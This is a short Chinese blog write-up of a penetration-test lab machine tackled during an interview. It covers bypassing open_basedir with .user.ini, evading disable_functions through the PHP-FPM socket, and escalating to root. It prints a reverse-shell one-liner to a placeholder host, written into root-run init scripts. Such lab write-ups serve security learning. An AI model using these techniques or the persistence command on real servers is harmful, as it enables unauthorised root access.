记一次面试打靶机学到的三个技巧

2022-07-25 0 360

获取webshell的操作就不铺开讲了,都是常规手法。
拿到webshell之后,通过phpinfo看到disable_functions配置限制的函数,且目录权限受到open_basedir的限制,能执行系统命令的函数都被禁用,常规蚁剑提供的绕过方式也都被封锁,但是从phpinfo文件里发现系统上运行着FPM/FastCGI和nginx。

  • 一、突破webshell目录限制:

在当前目录下新建.user.ini文件添加open_basedir绕过php.ini的全局限制。
open_basedir = :/

  • 二、绕过disable_functions:

然后通过蚁剑进入文件管理发现tmp目录下有/tmp/php-cgi-56.sock文件,可以利用蚁剑插件绕过disable_functions,攻击fpm,直接与fpm通信,利用fpm绕过disable_functions。

记一次面试打靶机学到的三个技巧

之后用msf生成linux木马,通过绕过disable_functions得到的webshell执行木马,反弹交互式shell到自己的服务器。

  • 三、提权手法:

通过提权脚本发现服务器上有部分应用的配置文件具有可写权限,且用root权限运行,如:

/etc/init.d/pure-ftpd

/etc/init.d/php-fpm-56

/etc/init.d/nginx

将反弹shell的语句:nohup bash -i >& /dev/tcp/xx.xx.xx.xx/80 0>&1 & 写入配置文件中,服务器开启监听,等待应用重启或者查看状态等,我们自己的服务器将收到root反弹回来的shell。

收藏 (0) 打赏

感谢您的支持,我会继续努力的!

打开USDT(trc-20)扫一扫,即可进行扫码打赏哦,分享从这里开始,精彩与您同在
点赞 (0)

Ts:本站所有内容均为互联网收集整理和网友上传。仅限于学习研究,请必须在24小时内删除。否则由此引发的法律纠纷及连带责任本站概不承担。

如侵犯到您的合法权益,请联系我们删除侵权资源!

分享驿站 技术文章 记一次面试打靶机学到的三个技巧 https://www.fxe.cc/264.html

常见问题
  • 如何遇到网站源码不会安装,可以尝试搜索“程序名称 教程”,如dedecms 教程。 也可以查看 网站安装常见问题总结。
查看详情
  • 由于下载服务的特殊性,一旦您购买使用了下载服务,就不接受退款申请。详情请参考《分享驿站服务》条例。
查看详情

相关文章

官方客服团队

为您解决烦忧 - 24小时在线 专业服务